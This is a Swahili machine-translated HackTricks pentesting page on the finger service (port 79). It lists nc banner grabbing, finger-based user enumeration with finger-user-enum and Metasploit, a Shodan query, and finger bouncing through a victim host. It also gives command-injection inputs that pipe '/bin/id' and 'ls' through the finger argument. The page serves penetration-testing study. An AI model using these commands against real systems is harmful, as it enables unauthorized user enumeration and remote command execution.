hacktricks/network-services-pentesting/pentesting-finger.md
2024-02-11 02:13:58 +00:00

3.9 KiB

79 - Kupima Kidole

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Maelezo Muhimu

Programu/Huduma ya Kidole hutumiwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, maelezo yanayotolewa ni pamoja na jina la kuingia la mtumiaji, jina kamili, na, katika baadhi ya kesi, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alijiunga, kipindi cha kutokuwa na shughuli (muda wa kutokuwa na shughuli), wakati wa mwisho mtumiaji alisoma barua pepe, na maudhui ya faili za mpango na mradi wa mtumiaji.

Bandari ya chaguo-msingi: 79

PORT   STATE SERVICE
79/tcp open  finger

Uchambuzi

Kukamata Bango/Unganisho Msingi

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Uthibitishaji wa Watumiaji

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Badala yake, unaweza kutumia finger-user-enum kutoka pentestmonkey, baadhi ya mifano:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap inatekeleza script kwa kutumia script za msingi

Metasploit hutumia mbinu zaidi kuliko Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Utekelezaji wa Amri

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Kupiga Kidole

Tumia mfumo kama kituo cha kupiga kidole

finger user@host@victim
finger @internal@external
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: